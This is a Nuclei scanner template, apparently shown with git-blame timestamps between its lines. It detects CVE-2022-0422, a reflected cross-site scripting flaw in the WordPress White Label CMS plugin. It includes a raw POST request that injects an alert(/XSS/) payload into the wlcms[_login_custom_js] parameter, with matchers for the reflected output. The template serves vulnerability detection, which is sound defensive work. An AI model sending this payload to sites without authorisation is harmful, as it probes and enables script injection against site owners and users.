2022-04-29 06:39:46 +00:00
id : CVE-2022-0422
info :
2022-09-10 01:55:52 +00:00
name : WordPress White Label CMS <2.2.9 - Cross-Site Scripting
2022-04-29 06:39:46 +00:00
author : random-robbie
2022-09-10 02:12:57 +00:00
severity : medium
2022-09-10 01:55:52 +00:00
description : |
WordPress White Label CMS plugin before 2.2.9 contains a reflected cross-site scripting vulnerability. It does not sanitize and validate the wlcms[_login_custom_js] parameter before outputting it back in the response while previewing.
2022-04-29 06:39:46 +00:00
reference :
- https://wpscan.com/vulnerability/429be4eb-8a6b-4531-9465-9ef0d35c12cc
2022-05-17 09:18:12 +00:00
- https://plugins.trac.wordpress.org/changeset/2672615
2022-09-10 01:55:52 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-0422
2022-04-29 06:40:08 +00:00
classification :
2022-09-10 02:12:57 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
2022-09-10 01:55:52 +00:00
cve-id : CVE-2022-0422
2022-09-10 02:12:57 +00:00
cwe-id : CWE-79
2023-08-31 11:46:18 +00:00
epss-score : 0.00133
2023-07-11 19:49:27 +00:00
cpe : cpe:2.3:a:videousermanuals:white_label_cms:*:*:*:*:*:wordpress:*:*
2023-08-31 11:46:18 +00:00
epss-percentile : 0.47722
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
framework : wordpress
vendor : videousermanuals
product : white_label_cms
tags : cve,cve2022,wordpress,xss,wp-plugin,wpscan
2022-04-29 06:39:46 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-04-29 06:39:46 +00:00
- raw :
- |
POST /wp-login.php?wlcms-action=preview HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
wlcms%5B_login_custom_js%5D=alert%28%2FXSS%2F%29%3B
matchers-condition : and
matchers :
- type : word
part : body
words :
- "alert(/XSS/);"
- type : word
part : body
words :
- "wlcms-login-wrapper"
- type : word
part : header
words :
- text/html
- type : status
status :
2022-09-10 01:55:52 +00:00
- 200